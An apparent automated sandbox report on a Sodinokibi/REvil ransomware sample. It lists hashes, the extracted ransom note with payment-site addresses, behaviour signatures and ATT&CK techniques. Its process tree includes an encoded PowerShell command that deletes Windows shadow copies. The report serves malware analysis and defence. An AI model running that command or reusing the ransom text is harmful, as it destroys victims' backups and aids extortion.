Analysis

  • max time kernel
    164s
  • max time network
    170s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:49

General

  • Target

    e4066a4a209222ef468655909b29619b0db8785e3eefc19c7236c52d2ec7af45.exe

  • Size

    163KB

  • MD5

    4dd5362cc9857d6f6f03ebd3b35ca9ae

  • SHA1

    9f463df893f8d795c9ecfc7e8d335278b162b362

  • SHA256

    e4066a4a209222ef468655909b29619b0db8785e3eefc19c7236c52d2ec7af45

  • SHA512

    db12b21988974232a2f93c34ca89e00dab9599803ea4859fe6bbaede167b7f1b39c8e1bc12de9db965b3bf6cf3637c377d2c54b6dd4b092f309c03b15f9e6173

Malware Config

Extracted

Path

C:\23488r4o96-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 23488r4o96. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5F116BA3E2900F02 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5F116BA3E2900F02 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: vAblOmksAwT6BBYPuiQeh2rG/Il3BStiVCueOQwy7Vh5l6BgwMzsWgO3vp+duoWE fwUiFjFTu/vZegKPReuBQ6uA6QiJ0hVmM91XOpE1LTpg5tYKNh7ROyd/RcPFcCIN Q0n3SOXSAI6s9lbaqZyCoTLfXtmOmLaxspvbgC8xJoFHM3iAhgMJ/eOIvVdY1dY0 32l9+50vTPhi7GObzaP9glZYuhy1FhbkpNrqSWrDCUyqsb0wejfb6lEkvjA6jk1A g02aIzcfsaj6FTU9AR0ZphheCzyD3mU4Xo3PGFIaP14d/6sksvDMHHWpTsz9uQs2 qAJj0vmr1TQCanoxM5RxgG0S2bUn7PrqOxw8VWeehZ9tCRm3RQKZrBIgkaqhkGPt 4YEhbJr1xVp0nMejRPU2vFtvFj3UHjJ3wcOL1LPZxgkJfhZqStnz6qeKpxGTl6Lj gbK2gMhkoj7sa+JdRrRwGCkUb+rV5hZqVpEkZInjiDsaACM4dQFtHA3DE0gfZzEt 0Ze48VfK/qtu8SBagALfSwSnKuCOr9ZMwkN0eCMHXaKWGKRFSyKmVNIbaV2mBGDF IHx9KNWQ38NHyMEzFcZJt0atwINQGa7MyVe0WhBvsnpRFV/b7tS3hbNpXVS5UFS+ 3KL31BUzk4VAkevc5VSxouW962wA33PswrMpnd+GDS+jdOUJpoIFeFmdahIYpLoH aA9k3NFM5wKDmIdDdQXorc6K5ul8xlqsJ2JsLQWVUtxWrvXwMnaQydTdWF0Rx02c mLp6EIVoC3iJld2Tf7QAWOa3WOxrpZh2+7izb1nVtRK865Vp0nVqYMEzpztKVXXz FLLOi7mHhNwsgisEtsf9stg4WexpHdborMReGsvdiPQFR1ymjeBOAcwKDrG3G+YA 53DcMfWcrMv0CYLca/PbiZY4wRP/Cru3AjoqnEYqQMGl611sjkHbDvnl84J6aR+C cUg+oB55+R0TZcXr/P0gB++wC+JwE1+zrvg6ehhi0Vo5y4edHngFxIrD+ZCA1Irh ohyagWM48WQ++6ZC/OBM6j/xtu0ePJ+SNkzK81Mm+m/SUB8EKIR2xzf+tEiDki97 uRXbRfAusTL4V+OHYhatC8RlqRGtyCtZhWSHzY8d9D6WHAo+wSuK+X84NnciLvAO Dfbeuu+i1nU09gKRQa77F21APgzxW+aqQ0DMilLYmFubLVy+T1+kTlUx8/ayH/nB BcQSb1U9aJiqKhzXU04Nh5TeWC/VyoT5uvrMna1v6RSeoRcIzjbbl5RKUEMTSAD5 cirgFWjMgLSD/WAnP8Y89obQCku3z+5b Extension name: 23488r4o96 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5F116BA3E2900F02

http://decryptor.cc/5F116BA3E2900F02

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 23 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e4066a4a209222ef468655909b29619b0db8785e3eefc19c7236c52d2ec7af45.exe
    "C:\Users\Admin\AppData\Local\Temp\e4066a4a209222ef468655909b29619b0db8785e3eefc19c7236c52d2ec7af45.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2768
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2328
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:992

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2768-119-0x000002345A540000-0x000002345A562000-memory.dmp
      Filesize

      136KB

    • memory/2768-122-0x000002345A0B0000-0x000002345A0B2000-memory.dmp
      Filesize

      8KB

    • memory/2768-124-0x000002345A0B3000-0x000002345A0B5000-memory.dmp
      Filesize

      8KB

    • memory/2768-125-0x0000023473230000-0x00000234732A6000-memory.dmp
      Filesize

      472KB